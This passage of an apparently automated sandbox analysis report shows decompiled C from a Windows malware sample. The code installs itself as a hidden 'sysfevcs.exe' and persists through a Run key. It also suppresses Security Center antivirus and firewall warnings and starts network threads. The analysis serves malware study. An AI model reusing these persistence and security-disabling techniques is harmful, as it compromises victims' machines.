_invalid_parameter 3 API calls 5566->5569 5567->5566 5581 40ddc0 5568->5581 5570 40b714 5569->5570 5572 408990 _invalid_parameter 3 API calls 5570->5572 5572->5577 5576 40b6cb InterlockedIncrement 5576->5577 5578 409f30 118 API calls 5580 40b753 5578->5580 5580->5577 5580->5578 5597 40a3d0 5580->5597 5582 40ddc4 5581->5582 5583 40b6b0 5581->5583 5582->5583 5584 40ddd5 InterlockedIncrement 5582->5584 5585 409610 5583->5585 5584->5583 5586 409490 2 API calls 5585->5586 5587 40961f 5586->5587 5588 409629 5587->5588 5589 40962d EnterCriticalSection 5587->5589 5588->5576 5588->5577 5591 40964c LeaveCriticalSection 5589->5591 5591->5588 5593 40a2e3 5592->5593 5594 40a30d memcpy 5592->5594 5595 408880 9 API calls 5593->5595 5594->5580 5596 40a304 5595->5596 5596->5594 5598 40a3f9 5597->5598 5599 40a3ee 5597->5599 5598->5599 5600 40a411 memmove 5598->5600 5599->5580 5600->5599 5601 40d7f0 5602 40d805 ioctlsocket 5601->5602 5603 40d8d0 5602->5603 5611 40d82a 5602->5611 5604 408990 _invalid_parameter 3 API calls 5603->5604 5606 40d8d6 5604->5606 5605 40d8b9 WaitForSingleObject 5605->5602 5605->5603 5607 40d854 recvfrom 5607->5605 5607->5611 5608 408880 9 API calls 5608->5611 5609 40d899 InterlockedExchangeAdd 5612 40d6c0 5609->5612 5611->5605 5611->5607 5611->5608 5611->5609 5614 40d6f5 5612->5614 5613 40d71f 5622 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5613->5622 5614->5613 5615 408820 7 API calls 5614->5615 5615->5613 5617 40d742 5623 40db50 5617->5623 5619 40d7de 5619->5611 5620 40d755 5620->5619 5621 40d7cb memmove 5620->5621 5621->5620 5622->5617 5624 40db62 5623->5624 5625 40db75 memcpy 5623->5625 5626 408880 9 API calls 5624->5626 5627 40db91 5625->5627 5628 40db6f 5626->5628 5627->5620 5628->5625 5893 40bc30 5903 40da90 5893->5903 5895 40bcbd 5896 4099a0 5 API calls 5897 40bc3e 5896->5897 5897->5895 5897->5896 5898 40bc58 InterlockedExchangeAdd 5897->5898 5899 40bc9c WaitForSingleObject 5897->5899 5902 409dd0 13 API calls 5897->5902 5898->5897 5898->5899 5899->5897 5900 40bcb5 5899->5900 5901 40da20 8 API calls 5900->5901 5901->5895 5902->5897 5904 408820 7 API calls 5903->5904 5905 40da9b CreateEventA socket 5904->5905 5906 40dad2 5905->5906 5912 40dad7 5905->5912 5909 40da20 8 API calls 5906->5909 5907 40db3a 5907->5897 5908 40dadd bind 5910 40db10 5908->5910 5911 40db1c CreateThread 5908->5911 5909->5912 5913 40da20 8 API calls 5910->5913 5911->5907 5912->5907 5912->5908 5914 40db15 5913->5914 5914->5897 5915 40bbb0 5918 40d8f0 5915->5918 5917 40bbd1 5919 40da03 5918->5919 5920 40d90f 5918->5920 5919->5917 5920->5919 5921 408840 _invalid_parameter 7 API calls 5920->5921 5922 40d936 memcpy htons 5921->5922 5923 40d9dc 5922->5923 5924 40d986 sendto 5922->5924 5927 408990 _invalid_parameter 3 API calls 5923->5927 5925 40d9a5 InterlockedExchangeAdd 5924->5925 5926 40d9d8 5924->5926 5925->5924 5928 40d9bb 5925->5928 5926->5923 5929 40d9f9 5926->5929 5930 40d9eb 5927->5930 5932 408990 _invalid_parameter 3 API calls 5928->5932 5931 408990 _invalid_parameter 3 API calls 5929->5931 5930->5917 5931->5919 5933 40d9ca 5932->5933 5933->5917 5934 4045b0 5935 40454b 5934->5935 5936 408990 _invalid_parameter 3 API calls 5935->5936 5937 4045bb LeaveCriticalSection 5936->5937 5629 4047fc 5631 4046fc 5629->5631 5630 4047f3 5632 40481c 5630->5632 5633 404210 15 API calls 5630->5633 5631->5630 5635 408990 _invalid_parameter 3 API calls 5631->5635 5634 408990 _invalid_parameter 3 API calls 5632->5634 5633->5632 5636 40483d 5634->5636 5637 404752 5635->5637 5638 40484c CreateFileW 5636->5638 5639 4048de LeaveCriticalSection 5636->5639 5640 408a00 8 API calls 5637->5640 5638->5639 5641 40486f 5638->5641 5642 404762 5640->5642 5645 4048ca FlushFileBuffers CloseHandle 5641->5645 5646 40488c WriteFile 5641->5646 5643 408990 _invalid_parameter 3 API calls 5642->5643 5644 404789 5643->5644 5647 40a8a0 7 API calls 5644->5647 5645->5639 5646->5641 5648 4047c0 5647->5648 5649 4059c0 10 API calls 5648->5649 5649->5630

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 74 40ce10-40ce33 GetLocaleInfoA 75 40ce36-40ce43 74->75 76 40ce73-40ce78 75->76 77 40ce45-40ce49 75->77 78 40ce7b-40ce85 76->78 79 40ce6a-40ce71 77->79 80 40ce4b-40ce5a 77->80 81 40ce87-40ce89 78->81 82 40ce8b 78->82 79->78 80->76 83 40ce5c-40ce68 80->83 84 40ce8d-40ce90 81->84 82->84 83->75 83->79
                                                                                                                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                                                                                                                  			E0040CE10() {
                                                                                                                                                                                                                                                                  				char _v16;
                                                                                                                                                                                                                                                                  				intOrPtr* _v20;
                                                                                                                                                                                                                                                                  				intOrPtr* _v24;
                                                                                                                                                                                                                                                                  				char _v25;
                                                                                                                                                                                                                                                                  				char _v26;
                                                                                                                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                                                                                                                  				char _t26;
                                                                                                                                                                                                                                                                  				char _t30;
                                                                                                                                                                                                                                                                  				intOrPtr* _t34;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				GetLocaleInfoA(0x400, 7,  &_v16, 0xa); // executed
                                                                                                                                                                                                                                                                  				_v20 = 0x40f358;
                                                                                                                                                                                                                                                                  				_v24 =  &_v16;
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					_t34 = _v24;
                                                                                                                                                                                                                                                                  					_t26 =  *_t34;
                                                                                                                                                                                                                                                                  					_v25 = _t26;
                                                                                                                                                                                                                                                                  					if(_t26 !=  *_v20) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(_v25 == 0) {
                                                                                                                                                                                                                                                                  						L5:
                                                                                                                                                                                                                                                                  						_v32 = 0;
                                                                                                                                                                                                                                                                  						L7:
                                                                                                                                                                                                                                                                  						_v36 = _v32;
                                                                                                                                                                                                                                                                  						if(_v36 != 0) {
                                                                                                                                                                                                                                                                  							return 0;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						return 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t34 = _v24;
                                                                                                                                                                                                                                                                  					_t30 =  *((intOrPtr*)(_t34 + 1));
                                                                                                                                                                                                                                                                  					_v26 = _t30;
                                                                                                                                                                                                                                                                  					_t13 = _v20 + 1; // 0x6f00524b
                                                                                                                                                                                                                                                                  					if(_t30 !=  *_t13) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v24 = _v24 + 2;
                                                                                                                                                                                                                                                                  					_v20 = _v20 + 2;
                                                                                                                                                                                                                                                                  					if(_v26 != 0) {
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L5;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				asm("sbb edx, edx");
                                                                                                                                                                                                                                                                  				asm("sbb edx, 0xffffffff");
                                                                                                                                                                                                                                                                  				_v32 = _t34;
                                                                                                                                                                                                                                                                  				goto L7;
                                                                                                                                                                                                                                                                  			}













                                                                                                                                                                                                                                                                  0x0040ce23
                                                                                                                                                                                                                                                                  0x0040ce29
                                                                                                                                                                                                                                                                  0x0040ce33
                                                                                                                                                                                                                                                                  0x0040ce36
                                                                                                                                                                                                                                                                  0x0040ce36
                                                                                                                                                                                                                                                                  0x0040ce39
                                                                                                                                                                                                                                                                  0x0040ce3b
                                                                                                                                                                                                                                                                  0x0040ce43
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ce49
                                                                                                                                                                                                                                                                  0x0040ce6a
                                                                                                                                                                                                                                                                  0x0040ce6a
                                                                                                                                                                                                                                                                  0x0040ce7b
                                                                                                                                                                                                                                                                  0x0040ce7e
                                                                                                                                                                                                                                                                  0x0040ce85
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ce8b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ce87
                                                                                                                                                                                                                                                                  0x0040ce4b
                                                                                                                                                                                                                                                                  0x0040ce4e
                                                                                                                                                                                                                                                                  0x0040ce51
                                                                                                                                                                                                                                                                  0x0040ce57
                                                                                                                                                                                                                                                                  0x0040ce5a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ce5c
                                                                                                                                                                                                                                                                  0x0040ce60
                                                                                                                                                                                                                                                                  0x0040ce68
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ce68
                                                                                                                                                                                                                                                                  0x0040ce73
                                                                                                                                                                                                                                                                  0x0040ce75
                                                                                                                                                                                                                                                                  0x0040ce78
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,?,?,?,?,?,00405D00), ref: 0040CE23
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                  • Opcode ID: 035626b101e5dd96c8aa8a3bb8c0f49562334bd41fc1dd2e35a048f5254cbfae
                                                                                                                                                                                                                                                                  • Instruction ID: e945fc326ac420ccfa53e590b165f1ee5d96da2e19c77812f8be0b4aaf5d160d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 035626b101e5dd96c8aa8a3bb8c0f49562334bd41fc1dd2e35a048f5254cbfae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B114C74D08249DFDF11CFA4C444BFEBBB1AB16314F0443AAD861362C1C3781A4ACBA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 0 405b40-405b5e Sleep 1 405b68-405b74 0->1 2 405b76-405b83 PathFileExistsW 1->2 3 405bbc-405bdc CreateMutexA GetLastError 1->3 4 405b85-405ba5 DeleteFileW DeleteFileA MoveFileA 2->4 5 405bab-405bba 2->5 6 405be6-405c6b GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 3->6 7 405bde-405be0 ExitProcess 3->7 4->5 5->1 8 405c71-405c8a 6->8 9 405cd7-405cdc 8->9 10 405c8c-405c94 8->10 11 405ce2-405cf5 9->11 12 405c96-405cb1 10->12 13 405ccb-405cd5 10->13 14 405cfb-405d06 call 40ce10 11->14 15 405f5e-405f89 Sleep RegOpenKeyExA 11->15 12->9 16 405cb3-405cc9 12->16 13->11 23 405d10-405d5e ExpandEnvironmentStringsW wsprintfW CopyFileW 14->23 24 405d08-405d0a ExitProcess 14->24 18 406075-406095 RegOpenKeyExA 15->18 19 405f8f-40606f RegSetValueExA * 7 RegCloseKey 15->19 16->8 16->13 21 406181-406196 Sleep call 40aee0 18->21 22 40609b-40617b RegSetValueExA * 7 RegCloseKey 18->22 19->18 32 4062ec-4062f5 21->32 33 40619c-4062e9 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 404320 call 40cd40 call 4058d0 CreateEventA call 40a610 call 40b810 call 409a60 call 40b8c0 * 4 21->33 22->21 26 405d64-405d93 SetFileAttributesW RegOpenKeyExW 23->26 27 405e3d-405e7f Sleep wsprintfW CopyFileW 23->27 30 405d99-405dae 26->30 31 405e1e-405e33 call 40d0b0 26->31 27->15 29 405e85-405eb4 SetFileAttributesW RegOpenKeyExW 27->29 35 405eba-405ecf 29->35 36 405f3f-405f54 call 40d0b0 29->36 38 405db4-405dd3 30->38 31->27 49 405e35-405e37 ExitProcess 31->49 33->32 41 405ed5-405ef4 35->41 36->15 51 405f56-405f58 ExitProcess 36->51 38->38 44 405dd5-405e18 RegSetValueExW RegCloseKey 38->44 41->41 47 405ef6-405f39 RegSetValueExW RegCloseKey 41->47 44->31 47->36
                                                                                                                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                                                                                                                  			_entry_() {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				char _v528;
                                                                                                                                                                                                                                                                  				int _v532;
                                                                                                                                                                                                                                                                  				int _v536;
                                                                                                                                                                                                                                                                  				char _v1060;
                                                                                                                                                                                                                                                                  				void* _v1064;
                                                                                                                                                                                                                                                                  				char _v1588;
                                                                                                                                                                                                                                                                  				short _v2108;
                                                                                                                                                                                                                                                                  				intOrPtr _v2112;
                                                                                                                                                                                                                                                                  				short _v2636;
                                                                                                                                                                                                                                                                  				void* _v2640;
                                                                                                                                                                                                                                                                  				char _v3044;
                                                                                                                                                                                                                                                                  				char _v3048;
                                                                                                                                                                                                                                                                  				int _v3052;
                                                                                                                                                                                                                                                                  				short _v3054;
                                                                                                                                                                                                                                                                  				short _v3056;
                                                                                                                                                                                                                                                                  				int _v3060;
                                                                                                                                                                                                                                                                  				int _v3064;
                                                                                                                                                                                                                                                                  				intOrPtr* _v3068;
                                                                                                                                                                                                                                                                  				intOrPtr _v3072;
                                                                                                                                                                                                                                                                  				short _v3074;
                                                                                                                                                                                                                                                                  				signed int _v3080;
                                                                                                                                                                                                                                                                  				intOrPtr* _v3084;
                                                                                                                                                                                                                                                                  				intOrPtr _v3088;
                                                                                                                                                                                                                                                                  				short _v3090;
                                                                                                                                                                                                                                                                  				signed int _v3096;
                                                                                                                                                                                                                                                                  				void* _t121;
                                                                                                                                                                                                                                                                  				int _t129;
                                                                                                                                                                                                                                                                  				signed char _t179;
                                                                                                                                                                                                                                                                  				int _t184;
                                                                                                                                                                                                                                                                  				signed char _t192;
                                                                                                                                                                                                                                                                  				long _t202;
                                                                                                                                                                                                                                                                  				signed char _t203;
                                                                                                                                                                                                                                                                  				int _t210;
                                                                                                                                                                                                                                                                  				short _t215;
                                                                                                                                                                                                                                                                  				short _t245;
                                                                                                                                                                                                                                                                  				void* _t278;
                                                                                                                                                                                                                                                                  				void* _t279;
                                                                                                                                                                                                                                                                  				void* _t286;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                  				_v536 = 0;
                                                                                                                                                                                                                                                                  				_v2112 = 0x2382;
                                                                                                                                                                                                                                                                  				while(_v536 < _v2112) {
                                                                                                                                                                                                                                                                  					_t210 = PathFileExistsW(L"2596396235629365635"); // executed
                                                                                                                                                                                                                                                                  					if(_t210 != 0) {
                                                                                                                                                                                                                                                                  						DeleteFileW(L"246266396537");
                                                                                                                                                                                                                                                                  						DeleteFileA("2352338747374");
                                                                                                                                                                                                                                                                  						MoveFileA("2959359672365276", "2346836423674");
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v536 = _v536 + 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t121 = CreateMutexA(0, 0, "5858874"); // executed
                                                                                                                                                                                                                                                                  				_v2640 = _t121;
                                                                                                                                                                                                                                                                  				if(GetLastError() != 0xb7) {
                                                                                                                                                                                                                                                                  					_v1064 = 0;
                                                                                                                                                                                                                                                                  					_v528 = 1;
                                                                                                                                                                                                                                                                  					GetModuleFileNameW(0, 0x413590, 0x105);
                                                                                                                                                                                                                                                                  					_v532 = PathFindFileNameW(0x413590);
                                                                                                                                                                                                                                                                  					wsprintfW( &_v524, L"%s:Zone.Identifier", 0x413590);
                                                                                                                                                                                                                                                                  					_t279 = _t278 + 0xc;
                                                                                                                                                                                                                                                                  					DeleteFileW( &_v524); // executed
                                                                                                                                                                                                                                                                  					ExpandEnvironmentStringsW(L"%userprofile%",  &_v2636, 0x104);
                                                                                                                                                                                                                                                                  					_v3048 = L"sysfevcs.exe";
                                                                                                                                                                                                                                                                  					_v3052 = _v532;
                                                                                                                                                                                                                                                                  					while(1) {
                                                                                                                                                                                                                                                                  						_t129 = _v3052;
                                                                                                                                                                                                                                                                  						_t215 =  *_t129;
                                                                                                                                                                                                                                                                  						_v3054 = _t215;
                                                                                                                                                                                                                                                                  						_t19 =  &_v3048; // 0x412bec
                                                                                                                                                                                                                                                                  						if(_t215 !=  *((intOrPtr*)( *_t19))) {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(_v3054 == 0) {
                                                                                                                                                                                                                                                                  							L12:
                                                                                                                                                                                                                                                                  							_v3060 = 0;
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							_v3064 = _v3060;
                                                                                                                                                                                                                                                                  							if(_v3064 == 0) {
                                                                                                                                                                                                                                                                  								L31:
                                                                                                                                                                                                                                                                  								Sleep(0x1f4);
                                                                                                                                                                                                                                                                  								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006,  &_v1064) == 0) {
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center\\Svc", 0, 0x20006,  &_v1064) == 0) {
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								Sleep(0x1f4);
                                                                                                                                                                                                                                                                  								if((E0040AEE0() & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  									__imp__#115(0x202,  &_v3044);
                                                                                                                                                                                                                                                                  									wsprintfW(0x4137a0, L"%s\\tbnds.dat",  &_v2636);
                                                                                                                                                                                                                                                                  									wsprintfW(0x413180, L"%s\\tbcmds.dat",  &_v2636);
                                                                                                                                                                                                                                                                  									CreateThread(0, 0, E00404120, 0, 0, 0);
                                                                                                                                                                                                                                                                  									Sleep(0x3e8);
                                                                                                                                                                                                                                                                  									CreateThread(0, 0, E004051D0, 0, 0, 0);
                                                                                                                                                                                                                                                                  									Sleep(0x3e8);
                                                                                                                                                                                                                                                                  									CreateThread(0, 0, E00405A20, 0, 0, 0);
                                                                                                                                                                                                                                                                  									Sleep(0x2710);
                                                                                                                                                                                                                                                                  									E00404320();
                                                                                                                                                                                                                                                                  									E004058D0(E0040CD40(),  &_v2636);
                                                                                                                                                                                                                                                                  									 *0x4139c4 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                  									 *0x4139cc = E0040A610( &_v2636);
                                                                                                                                                                                                                                                                  									 *0x4139c8 = E0040B810( &_v2636);
                                                                                                                                                                                                                                                                  									E00409A60();
                                                                                                                                                                                                                                                                  									E0040B8C0( *0x4139c8, 0, E0040BCD0, 0, 0, 0);
                                                                                                                                                                                                                                                                  									E0040B8C0( *0x4139c8, 0, E0040BC30, 0, 0, 0);
                                                                                                                                                                                                                                                                  									E0040B8C0( *0x4139c8, 0, E0040B7C0, 0, 0, 0);
                                                                                                                                                                                                                                                                  									E0040B8C0( *0x4139c8, 0, E0040B5C0, 0, 0, 0);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								return 0;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t179 = E0040CE10(); // executed
                                                                                                                                                                                                                                                                  							if((_t179 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  								ExpandEnvironmentStringsW(L"%windir%",  &_v2108, 0x104);
                                                                                                                                                                                                                                                                  								wsprintfW( &_v1588, L"%s\\%s",  &_v2108, L"sysfevcs.exe");
                                                                                                                                                                                                                                                                  								_t286 = _t279 + 0x10;
                                                                                                                                                                                                                                                                  								_t184 = CopyFileW(0x413590,  &_v1588, 0); // executed
                                                                                                                                                                                                                                                                  								if(_t184 == 0) {
                                                                                                                                                                                                                                                                  									L24:
                                                                                                                                                                                                                                                                  									Sleep(0x1f4);
                                                                                                                                                                                                                                                                  									wsprintfW( &_v1060, L"%s\\%s",  &_v2636, L"sysfevcs.exe");
                                                                                                                                                                                                                                                                  									_t279 = _t286 + 0x10;
                                                                                                                                                                                                                                                                  									if(CopyFileW(0x413590,  &_v1060, 0) == 0) {
                                                                                                                                                                                                                                                                  										goto L31;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									SetFileAttributesW( &_v1060, 3);
                                                                                                                                                                                                                                                                  									if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                                                                                                                                                                                                  										L29:
                                                                                                                                                                                                                                                                  										_t192 = E0040D0B0( &_v1060);
                                                                                                                                                                                                                                                                  										_t279 = _t279 + 4;
                                                                                                                                                                                                                                                                  										if((_t192 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  											goto L31;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										ExitProcess(0);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_v3084 =  &_v1060;
                                                                                                                                                                                                                                                                  									_v3088 = _v3084 + 2;
                                                                                                                                                                                                                                                                  									do {
                                                                                                                                                                                                                                                                  										_v3090 =  *_v3084;
                                                                                                                                                                                                                                                                  										_v3084 = _v3084 + 2;
                                                                                                                                                                                                                                                                  									} while (_v3090 != 0);
                                                                                                                                                                                                                                                                  									_v3096 = _v3084 - _v3088 >> 1;
                                                                                                                                                                                                                                                                  									RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1060, _v3096 + _v3096 + 2);
                                                                                                                                                                                                                                                                  									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                  									goto L29;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								SetFileAttributesW( &_v1588, 3); // executed
                                                                                                                                                                                                                                                                  								_t202 = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064); // executed
                                                                                                                                                                                                                                                                  								if(_t202 != 0) {
                                                                                                                                                                                                                                                                  									L22:
                                                                                                                                                                                                                                                                  									_t203 = E0040D0B0( &_v1588); // executed
                                                                                                                                                                                                                                                                  									_t286 = _t286 + 4;
                                                                                                                                                                                                                                                                  									if((_t203 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  										goto L24;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									ExitProcess(0); // executed
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_v3068 =  &_v1588;
                                                                                                                                                                                                                                                                  								_v3072 = _v3068 + 2;
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									_v3074 =  *_v3068;
                                                                                                                                                                                                                                                                  									_v3068 = _v3068 + 2;
                                                                                                                                                                                                                                                                  								} while (_v3074 != 0);
                                                                                                                                                                                                                                                                  								_v3080 = _v3068 - _v3072 >> 1;
                                                                                                                                                                                                                                                                  								RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1588, _v3080 + _v3080 + 2); // executed
                                                                                                                                                                                                                                                                  								RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                  								goto L22;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							ExitProcess(0);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t129 = _v3052;
                                                                                                                                                                                                                                                                  						_t245 =  *((intOrPtr*)(_t129 + 2));
                                                                                                                                                                                                                                                                  						_v3056 = _t245;
                                                                                                                                                                                                                                                                  						_t24 =  &_v3048; // 0x412bec
                                                                                                                                                                                                                                                                  						if(_t245 !=  *((intOrPtr*)( *_t24 + 2))) {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v3052 = _v3052 + 4;
                                                                                                                                                                                                                                                                  						_v3048 = _v3048 + 4;
                                                                                                                                                                                                                                                                  						if(_v3056 != 0) {
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  					asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                                                                                  					_v3060 = _t129;
                                                                                                                                                                                                                                                                  					goto L14;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				ExitProcess(0);
                                                                                                                                                                                                                                                                  			}










































                                                                                                                                                                                                                                                                  0x00405b4e
                                                                                                                                                                                                                                                                  0x00405b54
                                                                                                                                                                                                                                                                  0x00405b5e
                                                                                                                                                                                                                                                                  0x00405b68
                                                                                                                                                                                                                                                                  0x00405b7b
                                                                                                                                                                                                                                                                  0x00405b83
                                                                                                                                                                                                                                                                  0x00405b8a
                                                                                                                                                                                                                                                                  0x00405b95
                                                                                                                                                                                                                                                                  0x00405ba5
                                                                                                                                                                                                                                                                  0x00405ba5
                                                                                                                                                                                                                                                                  0x00405bb4
                                                                                                                                                                                                                                                                  0x00405bb4
                                                                                                                                                                                                                                                                  0x00405bc5
                                                                                                                                                                                                                                                                  0x00405bcb
                                                                                                                                                                                                                                                                  0x00405bdc
                                                                                                                                                                                                                                                                  0x00405be6
                                                                                                                                                                                                                                                                  0x00405bf0
                                                                                                                                                                                                                                                                  0x00405c06
                                                                                                                                                                                                                                                                  0x00405c17
                                                                                                                                                                                                                                                                  0x00405c2e
                                                                                                                                                                                                                                                                  0x00405c34
                                                                                                                                                                                                                                                                  0x00405c3e
                                                                                                                                                                                                                                                                  0x00405c55
                                                                                                                                                                                                                                                                  0x00405c5b
                                                                                                                                                                                                                                                                  0x00405c6b
                                                                                                                                                                                                                                                                  0x00405c71
                                                                                                                                                                                                                                                                  0x00405c71
                                                                                                                                                                                                                                                                  0x00405c77
                                                                                                                                                                                                                                                                  0x00405c7a
                                                                                                                                                                                                                                                                  0x00405c81
                                                                                                                                                                                                                                                                  0x00405c8a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405c94
